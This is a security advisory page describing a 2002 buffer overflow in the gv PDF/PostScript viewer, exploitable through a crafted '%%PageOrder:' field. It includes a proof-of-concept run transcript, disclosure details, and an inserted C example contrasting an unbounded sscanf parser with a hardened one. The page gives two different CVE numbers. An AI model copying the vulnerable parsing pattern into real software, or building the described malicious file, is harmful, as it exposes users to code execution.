SecurityTracker.com
Category:  Application (Generic)  >  gv
Vendors:  Plass, Johannes
'gv' Postscript and PDF File Viewer Buffer Overflow May Execute Remotely Supplied Code in Malicious Postscript or PDF Files
SecurityTracker Alert ID:  1005299
SecurityTracker URL:  http://securitytracker.com/id?1005299
CVE Reference:  CAN-2002-0838   (Links to External Site)
Updated:  Aug 13 2004
Original Entry Date:  Sep 26 2002
Impact:  Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Advisory:  iDEFENSE
Version(s): 3.5.8
Description:  A buffer overflow vulnerability was reported in the 'gv' postscript and PDF file viewer. A remote user can create a malicious file that, when viewed by the target user, will cause arbitrary code to be executed.

iDEFENSE reported that there is a buffer overflow due to an unsafe sscanf() call.

A demonstration exploit is provided in the Source Message (it is Base64 encoded). A demonstration exploit transcript is also provided:

[root@victim]# ls -al /tmp/itworked
/bin/ls: /tmp/itworked: No such file or directory
[root@victim]# gv gv-exploit.pdf
[root@victim]# ls -al /tmp/itworked
-rw-r--r-- 1 root root 0 Aug 22 16:50 /tmp/itworked

Impact:  A remote user can create a malicious file that, when viewed by gv, will cause arbitrary code to be executed by the target user's gv viewer. The code will run with the privileges of the target user.
Solution:  No solution was available at the time of this entry. iDEFENSE reports that the vendor could not be contacted and the main home page has not been updated since 1997. iDEFENSE has reportedly coordinated public disclosure with Unix vendors, so it is possible that patches will be released for various Unix/Linux distributions.
Vendor URL:  wwwthep.physik.uni-mainz.de/~plass/gv/ (Links to External Site)
Cause:  Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Oct 11 2002 (KDE Issues Fix for KGhostview) Re: 'gv' Postscript and PDF File Viewer Buffer Overflow May Execute Remotely Supplied Code in Malicious Postscript or PDF Files   (Dirk Mueller <mueller@kde.org>)
KDE issues a fix for KGhostview.
Oct 16 2002 (Debian Issues Fix) 'gv' Postscript and PDF File Viewer Buffer Overflow May Execute Remotely Supplied Code in Malicious Postscript or PDF Files   (joey@infodrom.org (Martin Schulze))
Debian has released a fix.
Oct 18 2002 (Debian Issues Fix for Gnome-gv) 'gv' Postscript and PDF File Viewer Buffer Overflow May Execute Remotely Supplied Code in Malicious Postscript or PDF Files   (joey@infodrom.org (Martin Schulze))
Debian has released a fix for gnome-gv.
Aug 13 2004 (Gentoo Issues Fix) 'gv' Postscript and PDF File Viewer Buffer Overflow May Execute Remotely Supplied Code in Malicious Postscript or PDF Files   (Sune Kloppenborg Jeppesen <jaervosz@gentoo.org>)
Gentoo has released a fix.



 Source Message Contents

Date:  Thu, 26 Sep 2002 11:56:18 -0400
Subject:  iDEFENSE Security Advisory 09.26.2002: Exploitable Buffer Overflow in gv


iDEFENSE Security Advisory 09.26.2002
Exploitable Buffer Overflow in gv

DESCRIPTION

The gv program that is shipped on many Unix systems contains a buffer
overflow which can be exploited by an attacker sending a malformed
postscript or Adobe pdf file. The attacker would be able to cause
arbitrary code to run with the privileges of the victim on his Linux
computer. The gv program is a PDF and postscript viewing program for
Unix which interfaces with the ghostscript interpreter. It is
maintained at http://wwwthep.physik.uni-mainz.de/~plass/gv/ by
Johannes Plass.  This particular security vulnerability occurs in the
source code where an unsafe sscanf() call is used to interpret
PostScript and PDF files.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CAN-2001-0832 to this issue.

 
ANALYSIS

In order to perform exploitation, an attacker would have to trick a
user into viewing a malformed PDF or PostScript file from the command
line. This may be somewhat easier for Unix-based email programs that
associate gv with email attachments. Since gv is not normally
installed setuid root, an attacker would only be able to cause
arbitrary code to run with the privileges of that user.  Other
programs that utilize derivatives of gv, such as ggv or kghostview,
may also be vulnerable in similar ways.

A proof of concept exploit for Red Hat Linux designed by zen-parse is
attached to this message.  It packages the overflow and shellcode in
the "%%PageOrder:" section of the PDF.

[root@victim]# ls -al /tmp/itworked 
/bin/ls: /tmp/itworked: No such file or directory 
[root@victim]# gv gv-exploit.pdf 
[root@victim]# ls -al /tmp/itworked 
-rw-r--r-- 1 root root 0 Aug 22 16:50 /tmp/itworked
[root@victim]# 
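The advisory names the bug class (an unsafe sscanf() call while interpreting DSC comments such as "%%PageOrder:") but does not quote gv's source. The following C example is added here to illustrate that class and its fix; it is not gv's code and not part of the advisory. The function names, the 31-character value limit and the constructed input lines are assumptions. The unbounded "%s" form is shown only for contrast and is never called; the hardened form ties the conversion to the buffer with a field width and uses "%n" to reject a value that was cut off at the width instead of silently truncating it.

```c
#include <stdio.h>
#include <string.h>

/* Added illustration of an unbounded sscanf("%s") on a DSC comment line,
 * the bug class the advisory describes. Not gv's own source; names and
 * the 31-character limit are assumptions made for this example. */

#define PAGEORDER_MAX 31   /* longest accepted value, excluding the NUL;
                              must match the width in the format below */

/* Vulnerable pattern, kept for contrast and never called here: "%s" has no
 * field width, so a value longer than 'out' runs past the end of it. */
int parse_page_order_unsafe(const char *line, char out[PAGEORDER_MAX + 1])
{
    /* In a scanf format "%%" matches one literal '%', so "%%%%" matches "%%". */
    return sscanf(line, "%%%%PageOrder: %s", out) == 1;
}

/* Hardened form. Returns 1 if a value was parsed, 0 if the line is not a
 * %%PageOrder line, and -1 if the value is longer than PAGEORDER_MAX. */
static int parse_page_order(const char *line, char out[PAGEORDER_MAX + 1])
{
    int consumed = 0;
    out[0] = '\0';
    /* "%31s" stores at most 31 characters plus the NUL; "%n" records how
     * much of the line was consumed and does not count toward the result. */
    if (sscanf(line, "%%%%PageOrder: %31s%n", out, &consumed) != 1)
        return 0;
    /* After a complete token the next character must be whitespace or the
     * end of the string; anything else means the value was cut off. */
    if (line[consumed] != '\0' && strchr(" \t\r\n", line[consumed]) == NULL)
        return -1;
    return 1;
}

/* Status only, for checking a single line. */
static int page_order_status(const char *line)
{
    char value[PAGEORDER_MAX + 1];
    return parse_page_order(line, value);
}

/* Constructed input: "%%PageOrder: " followed by value_len 'A' characters.
 * Returns the parser status; if stored_len is non-NULL it receives the
 * length of what the hardened parser actually stored. */
static int overlong_page_order(size_t value_len, size_t *stored_len)
{
    static char line[1024];
    char value[PAGEORDER_MAX + 1];
    const char *prefix = "%%PageOrder: ";
    size_t plen = strlen(prefix);
    int status;

    if (value_len > sizeof line - plen - 2)
        value_len = sizeof line - plen - 2;
    memcpy(line, prefix, plen);
    memset(line + plen, 'A', value_len);
    line[plen + value_len] = '\n';
    line[plen + value_len + 1] = '\0';

    status = parse_page_order(line, value);
    if (stored_len != NULL)
        *stored_len = strlen(value);
    return status;
}

int main(void)
{
    size_t stored = 0;
    int status;

    printf("\"%%%%PageOrder: Ascend\"  -> %d\n",
           page_order_status("%%PageOrder: Ascend\n"));
    printf("\"%%%%Pages: 3\"           -> %d\n",
           page_order_status("%%Pages: 3\n"));
    status = overlong_page_order(512, &stored);
    printf("512-character value     -> %d (stored %zu characters)\n",
           status, stored);
    return 0;
}
```

With a 512-character value the hardened parser returns -1 and the buffer holds exactly 31 characters; the same line fed to the unbounded form would write all 512 bytes into a 32-byte buffer, which is the condition the advisory's proof of concept relies on.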


DETECTION

This vulnerability affects the latest version of gv, 3.5.8. An
exploit has been tested on Red Hat Linux 7.3. 


WORKAROUND

To avoid potential exploitation, users can select alternatives to gv
such as Kghostview (included with the KDE desktop environment) for
instance. Additionally, the vulnerability does not seem to be
exploitable when a file is opened from the gv interface instead of
the command line.


VENDOR RESPONSE

The author could not be contacted, and the main home page has not
been updated since 1997.  Coordinated public disclosure was scheduled
for September 26, 2002 with Unix vendors.


DISCLOSURE TIMELINE

8/23/2002 Disclosed to iDEFENSE
9/6/2002  Disclosed to vendor (plass@thep.physik.uni-mainz.de) by
iDEFENSE
9/6/2002  Disclosed to iDEFENSE clients
9/12/2002 Disclosed to Unix vendors 
9/13/2002 Second vendor disclosure attempt
9/26/2002 Public Disclosure


CREDIT 

This issue was exclusively disclosed to iDEFENSE by zen-parse
(zen-parse@gmx.net).  


Content-Type: application/octet-stream;
 name="gv-exploit.pdf"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
 filename="gv-exploit.pdf"



Copyright 2004, SecurityGlobal.net LLC